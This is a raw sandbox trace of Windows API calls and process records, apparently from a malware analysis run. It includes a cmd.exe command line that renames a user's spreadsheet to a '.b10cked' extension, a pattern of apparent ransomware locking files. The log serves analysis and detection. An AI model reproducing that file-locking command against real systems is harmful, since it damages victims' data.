nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef4c0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.014] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.014] GetFileType (hFile=0x4c) returned 0x1 [0141.014] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.014] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef510*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef510*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.014] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.014] GetFileType (hFile=0x4c) returned 0x1 [0141.014] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.014] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef560*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef560*, lpNumberOfBytesWritten=0x1ee564*=0x20, lpOverlapped=0x0) returned 1 [0141.014] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.014] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.014] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.014] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x200, lpOverlapped=0x0) returned 1 [0141.014] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.014] GetFileType (hFile=0x4c) returned 0x1 [0141.014] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.014] GetFileType (hFile=0x4c) returned 0x1 [0141.014] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.014] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.014] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.014] GetFileType (hFile=0x4c) returned 0x1 [0141.014] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.014] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef3d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef3d0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.015] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.015] GetFileType (hFile=0x4c) returned 0x1 [0141.015] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.015] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef420*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef420*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.015] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.015] GetFileType (hFile=0x4c) returned 0x1 [0141.015] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.015] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef470*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef470*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.015] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.015] GetFileType (hFile=0x4c) returned 0x1 [0141.015] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.015] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef4c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef4c0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.015] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.015] GetFileType (hFile=0x4c) returned 0x1 [0141.015] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.015] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef510*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef510*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.015] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.015] GetFileType (hFile=0x4c) returned 0x1 [0141.015] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.015] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef560*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef560*, lpNumberOfBytesWritten=0x1ee564*=0x20, lpOverlapped=0x0) returned 1 [0141.015] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.015] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.015] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.015] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x200, lpOverlapped=0x0) returned 1 [0141.016] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.016] GetFileType (hFile=0x4c) returned 0x1 [0141.016] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.016] GetFileType (hFile=0x4c) returned 0x1 [0141.016] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.016] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.016] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.016] GetFileType (hFile=0x4c) returned 0x1 [0141.016] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.016] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef3d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef3d0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.016] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.016] GetFileType (hFile=0x4c) returned 0x1 [0141.016] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.016] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef420*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef420*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.016] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.016] GetFileType (hFile=0x4c) returned 0x1 [0141.016] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.016] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef470*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef470*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.016] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.016] GetFileType (hFile=0x4c) returned 0x1 [0141.016] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.017] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef4c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef4c0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.017] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.017] GetFileType (hFile=0x4c) returned 0x1 [0141.017] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.017] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef510*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef510*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.017] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.017] GetFileType (hFile=0x4c) returned 0x1 [0141.017] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.017] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef560*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef560*, lpNumberOfBytesWritten=0x1ee564*=0x20, lpOverlapped=0x0) returned 1 [0141.018] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.018] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.018] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.018] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x200, lpOverlapped=0x0) returned 1 [0141.018] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.018] GetFileType (hFile=0x4c) returned 0x1 [0141.018] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.018] GetFileType (hFile=0x4c) returned 0x1 [0141.018] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.018] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.018] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.018] GetFileType (hFile=0x4c) returned 0x1 [0141.018] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.018] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef3d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef3d0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.018] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.018] GetFileType (hFile=0x4c) returned 0x1 [0141.018] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.018] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef420*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef420*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.018] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.018] GetFileType (hFile=0x4c) returned 0x1 [0141.018] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.018] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef470*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef470*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.018] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.018] GetFileType (hFile=0x4c) returned 0x1 [0141.019] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.019] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef4c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef4c0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.019] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.019] GetFileType (hFile=0x4c) returned 0x1 [0141.019] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.019] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef510*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef510*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.019] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.019] GetFileType (hFile=0x4c) returned 0x1 [0141.019] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.019] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef560*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef560*, lpNumberOfBytesWritten=0x1ee564*=0x20, lpOverlapped=0x0) returned 1 [0141.019] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.019] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.019] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.019] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x200, lpOverlapped=0x0) returned 1 [0141.019] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.019] GetFileType (hFile=0x4c) returned 0x1 [0141.019] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.019] GetFileType (hFile=0x4c) returned 0x1 [0141.019] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.019] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.019] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.019] GetFileType (hFile=0x4c) returned 0x1 [0141.019] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.019] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef3d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef3d0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.020] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.020] GetFileType (hFile=0x4c) returned 0x1 [0141.020] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.020] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef420*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef420*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.020] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.020] GetFileType (hFile=0x4c) returned 0x1 [0141.020] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.020] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef470*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef470*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.020] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.020] GetFileType (hFile=0x4c) returned 0x1 [0141.020] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.020] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef4c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef4c0*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.020] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.020] GetFileType (hFile=0x4c) returned 0x1 [0141.020] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.020] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef510*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef510*, lpNumberOfBytesWritten=0x1ee564*=0x50, lpOverlapped=0x0) returned 1 [0141.020] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.020] GetFileType (hFile=0x4c) returned 0x1 [0141.020] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.020] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef560*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef560*, lpNumberOfBytesWritten=0x1ee564*=0x20, lpOverlapped=0x0) returned 1 [0141.020] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.020] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.021] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.021] ReadFile (in: hFile=0x54, lpBuffer=0x1ef380, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee570, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesRead=0x1ee570*=0x32, lpOverlapped=0x0) returned 1 [0141.021] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.021] GetFileType (hFile=0x4c) returned 0x1 [0141.021] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.021] GetFileType (hFile=0x4c) returned 0x1 [0141.021] _get_osfhandle (_FileHandle=1) returned 0x4c [0141.021] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef380*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1ee564, lpOverlapped=0x0 | out: lpBuffer=0x1ef380*, lpNumberOfBytesWritten=0x1ee564*=0x32, lpOverlapped=0x0) returned 1 [0141.021] _get_osfhandle (_FileHandle=4) returned 0x54 [0141.021] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee550 | out: lpNewFilePointer=0x0) returned 1 [0141.021] _close (_FileHandle=4) returned 0 [0141.021] FindNextFileW (in: hFindFile=0x2d0e90, lpFindFileData=0x1ef5e4 | out: lpFindFileData=0x1ef5e4) returned 0 [0141.022] GetLastError () returned 0x12 [0141.022] FindClose (in: hFindFile=0x2d0e90 | out: hFindFile=0x2d0e90) returned 1 [0141.022] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0141.022] _close (_FileHandle=3) returned 0 [0141.023] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.023] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.023] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.023] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.023] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.023] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.023] SetConsoleInputExeNameW () returned 0x1 [0141.023] GetConsoleOutputCP () returned 0x1b5 [0141.023] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.023] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.024] exit (_Code=0) Process: id = "158" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0xe0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14616 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14617 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14618 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14619 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 14620 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14621 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14622 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14623 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14624 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 14625 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15570 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15571 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15572 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15573 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 15574 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 15575 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15576 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15577 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15578 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15579 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15580 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15581 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15582 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15583 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15584 start_va = 0x390000 end_va = 0x457fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 15585 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15586 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15587 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15588 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 15589 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 15590 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 15591 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 15592 start_va = 0x570000 end_va = 0x116ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 15593 start_va = 0x1170000 end_va = 0x12d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Thread: id = 215 os_tid = 0xe1c [0140.230] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efcdc | out: lpSystemTimeAsFileTime=0x2efcdc*(dwLowDateTime=0x8d845e20, dwHighDateTime=0x1d440a9)) [0140.230] GetCurrentProcessId () returned 0xe0c [0140.230] GetCurrentThreadId () returned 0xe1c [0140.230] GetTickCount () returned 0x2c0af [0140.230] QueryPerformanceCounter (in: lpPerformanceCount=0x2efcd4 | out: lpPerformanceCount=0x2efcd4*=19701965372) returned 1 [0140.231] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.231] __set_app_type (_Type=0x1) [0140.231] __p__fmode () returned 0x76b331f4 [0140.231] __p__commode () returned 0x76b331fc [0140.231] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.231] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.232] GetCurrentThreadId () returned 0xe1c [0140.232] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe1c) returned 0x38 [0140.232] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.232] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.232] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.232] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.232] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efc6c | out: phkResult=0x2efc6c*=0x0) returned 0x2 [0140.232] VirtualQuery (in: lpAddress=0x2efca3, lpBuffer=0x2efc3c, dwLength=0x1c | out: lpBuffer=0x2efc3c*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.232] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efc3c, dwLength=0x1c | out: lpBuffer=0x2efc3c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, 